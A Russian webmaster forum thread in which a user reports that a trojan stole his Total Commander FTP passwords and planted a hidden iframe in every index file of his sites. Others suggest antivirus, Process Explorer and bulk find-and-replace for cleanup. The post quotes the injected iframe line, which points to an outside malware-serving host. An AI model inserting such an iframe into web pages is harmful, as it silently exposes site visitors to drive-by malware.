- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
В 2023 году 36,9% всех DDoS-атак пришлось на сферу финансов
А 24,9% – на сегмент электронной коммерции
Оксана Мамчуева
Внимание всем - эпидемия вируса!
Началось с того, что у меня перестали открываться мои сайты в IE. Потом упал IE - ну туда ему и дорога ...
Начал смотреть и обнаружил, что в файлах index.htm и index.php прописан следущий код:
<!-- ~ --><iframe width="0" height="0" src="http://mdfc.info"></iframe><!-- ~ -->
аккурат в конце.
Этот ифрейм, вызывает сайт, на котором скрипт лезет в IE и заставляет его качать какую-то гадость. Остальные браузеры нормально его переносят - игнорируют.
Я вначале подумал, что хостинг взломали, но когда обнаружил, что даже сайты на народе заражены - понял, что троян. Он использовал ftp пароли из Total Comander.
В страшной злобе прошерстил комп, нашел троян. Заменил пароли и убрал инъекции.
НО! Спустя день обнаружил, что скрипт прописывается во ВСЕ index файлы всех подпапок (например в джумле мне пришлось менять около 250 файлов!!!!).
Я конечно все убил. Но, скажите, как защититься-то? Как представил, скольких мои сайты заразили .... :eek:
Кто что знает?
Мне лень ловить бинарник, если честно.. думаю, стоит проверить список процессов для начала, в расчете на то, что троян тупой. Проверь, есть ли там что-то лишнее. Если не знаешь, выложи список или скрин.
Мне лень ловить бинарник, если честно.. думаю, стоит проверить список процессов для начала, в расчете на то, что троян тупой. Проверь, есть ли там что-то лишнее. Если не знаешь, выложи список или скрин.
К своему стыду, ничего не понял ... Скрин чего выложить?
ctrl+alt+delite в окошке вкладка процессы.
Это процессы, которые в данное время использует твоя ОС.
ctrl+alt+delite в окошке вкладка процессы.
Это процессы, которые в данное время использует твоя ОС.
Вот картинка: http://shamkovel.ru/files/1.jpg
Писал вчера про этот троян в спец. теме анонса белых каталогов. Данный вирус был замечен в одном из каталогов спец. темы. Правда подгуражался с другого адреса.
Nod32 удачно его ловит и блокирует.
Поэтому вывод один: работать при включённом антивирусе.
У меня был недавно такой троянчик. Аваст его полечил. Но IE до сих пор не открываеся - дллки какой-то, говорит, не хватает. Но и фиг с ним.
К своему стыду, ничего не понял ... Скрин чего выложить?
Установите тулзу от sysinternals
http://www.microsoft.com/technet/sysinternals/ProcessesAndThreads/ProcessExplorer.mspx
Показывает все процессы хэндлы, дллы под процессом.
Незаменимая вещь для удаления вражеского ПО.
У меня был недавно такой троянчик. Аваст его полечил. Но IE до сих пор не открываеся - дллки какой-то, говорит, не хватает. Но и фиг с ним.
Вот я и советую ставить антивирусы, которые ловят вирусы на лету и не дают им загрузиться.
НО! Спустя день обнаружил, что скрипт прописывается во ВСЕ index файлы всех подпапок (например в джумле мне пришлось менять около 250 файлов!!!!).
Это не так сложно. Есть программки, которые помагают вносить изменения сразу в куча файлов. К примеру, если потребовалось удалить данный код указываем данный код в окошке найти, а окошко заменить оставляем пустое. (Это я про Text Replacer)
У меня был недавно такой троянчик. Аваст его полечил. Но IE до сих пор не открываеся - дллки какой-то, говорит, не хватает. Но и фиг с ним.
Вот-вот - этот вирус прописался в dll экспловера, а без него работать естественно не будет.
Кстати, может кто скажет - где 6 IE скачать можно (чтобы смотреть как себя дизайн ведет), ну или этот dll ...
Это не так сложно. Есть программки, которые помагают вносить изменения сразу в куча файлов. К примеру, если потребовалось удалить данный код указываем данный код в окошке найти, а окошко заменить оставляем пустое. (Это я про Text Replacer)
Так так, по подробнее, что за програмка?
И сможет ли она работать на хостинге?